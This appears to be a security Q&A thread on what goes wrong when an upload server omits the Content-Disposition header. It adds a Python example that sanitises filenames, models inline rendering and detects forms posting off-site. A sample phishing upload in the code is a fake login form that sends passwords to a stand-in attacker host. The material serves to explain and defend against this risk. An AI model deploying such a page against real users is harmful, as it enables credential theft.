4

Imagine a server that serves untrusted user-provided files and allows other users to download them. Under some circumstances the server can be tricked into returning responses to download-file requests without a Content-Disposition header (i.e. the files are shown inline in the browser window).

However, other security hygiene measures are still in place:

  • Files are served from a different domain than the main site's content
  • A correct Content-Type header and X-Content-Type-Options: nosniff are set

What are the security risks of returning responses without a Content-Disposition header?

Rory Alsop
Andrei Botalov

1 Answer

2

It depends on what file types are allowed to be uploaded and how the files are handled.

  • If the page is loaded directly, the file ends in .php, and the web server recognizes and executes PHP files, then you risk having the entire domain compromised.
  • A smaller issue is that an HTML file may be a phishing page, sending any results to a server controlled by the attacker (cross-domain posting via JavaScript may not be possible, but you can make any cross-domain request through (visible or invisible) forms). The domain and perhaps even the HTTPS certificate clearly show that it is on your domain or a subdomain (unless you use a completely different domain), and thus the user might think that the page is trustworthy.
  • And perhaps other things that don't come to mind right now.
Luc
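As an added example (not code from the question or the answer above), the following Python models the two outcomes under discussion: an uploaded HTML file served with `Content-Disposition: attachment` versus the same file served without that header, where the browser renders it and a plain `<form>` inside it can post credentials to any origin. It also shows the filename sanitisation a practitioner wants when building the header, since a user-supplied name containing `"` or a path would otherwise land in the quoted-string. Function and constant names, the `files.example.net` / `attacker.example` hosts and the sample upload are all hypothetical; the header names are the standard ones. Only the Python standard library is used.

```python
"""Model of serving a user upload with and without Content-Disposition.

Added example, not code from the original question or answer.  The names
below (build_download_headers, files.example.net, attacker.example, ...)
are assumptions for illustration only.
"""

import re
from html.parser import HTMLParser
from urllib.parse import quote, urlsplit

# Declared types a browser renders in the window when no "attachment"
# disposition is present.  With nosniff set, the browser does not guess a
# different type from the bytes, so only the declared type matters here.
RENDERABLE_TYPES = {"text/html", "text/plain", "image/png", "image/jpeg",
                    "application/pdf"}


def safe_filename(name: str) -> str:
    """Reduce a user-supplied name to a conservative ASCII token so it cannot
    break out of the quoted-string in the Content-Disposition header."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path part
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base).strip("._")
    return base or "download"


def build_download_headers(original_name: str, content_type: str,
                           force_attachment: bool = True) -> dict:
    """Headers for serving an uploaded file.  Content-Type is kept as the
    caller determined it (the question's premise: it is correct).  Passing
    force_attachment=False reproduces the failure mode in the question: the
    Content-Disposition header is simply missing."""
    headers = {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
    }
    if force_attachment:
        ascii_name = safe_filename(original_name)
        # RFC 6266: ASCII fallback plus an RFC 5987 encoded form of the name
        headers["Content-Disposition"] = (
            f'attachment; filename="{ascii_name}"; '
            f"filename*=UTF-8''{quote(original_name, safe='')}"
        )
    return headers


def browser_renders_inline(headers: dict) -> bool:
    """Rough model of browser behaviour: the response is rendered inline when
    the declared type is renderable and no 'attachment' disposition is set."""
    disposition = headers.get("Content-Disposition", "").split(";")[0].strip().lower()
    if disposition == "attachment":
        return False
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    return ctype in RENDERABLE_TYPES


class _FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> in an HTML document."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def cross_origin_form_targets(html: str, served_from: str) -> list:
    """Return the form actions in an uploaded HTML file that submit to an
    origin other than the one the file is served from.  This is the phishing
    case from the answer: even if script is blocked from posting cross-domain,
    a plain <form> is not.  Scheme-relative actions (//host/path) count too."""
    parser = _FormActionCollector()
    parser.feed(html)
    ours = urlsplit(served_from)
    off_site = []
    for action in parser.actions:
        target = urlsplit(action)
        scheme = target.scheme or ours.scheme
        if target.netloc and (scheme, target.netloc) != (ours.scheme, ours.netloc):
            off_site.append(action)
    return off_site


# Constructed sample upload: a fake login form posting to an attacker host.
PHISHING_UPLOAD = """<html><body>
<p>Your session has expired. Please sign in again.</p>
<form action="https://attacker.example/collect" method="post">
  <input name="user"><input name="pass" type="password"><button>Sign in</button>
</form></body></html>"""


if __name__ == "__main__":
    missing = build_download_headers("invoice.html", "text/html", force_attachment=False)
    forced = build_download_headers("invoice.html", "text/html")
    print("no Content-Disposition, rendered inline:", browser_renders_inline(missing))
    print("attachment disposition, rendered inline:", browser_renders_inline(forced))
    print("forms posting off-site:",
          cross_origin_form_targets(PHISHING_UPLOAD, "https://files.example.net"))
```

The point the model makes explicit: the two hygiene measures from the question (separate domain, correct `Content-Type` plus `nosniff`) do not stop a `text/html` upload from rendering once the disposition header is gone; the separate domain only limits what the rendered page can reach, not whether it renders. Serving every upload with `attachment` is what keeps the browser from rendering it, and the filename going into that header needs the same distrust as any other user input.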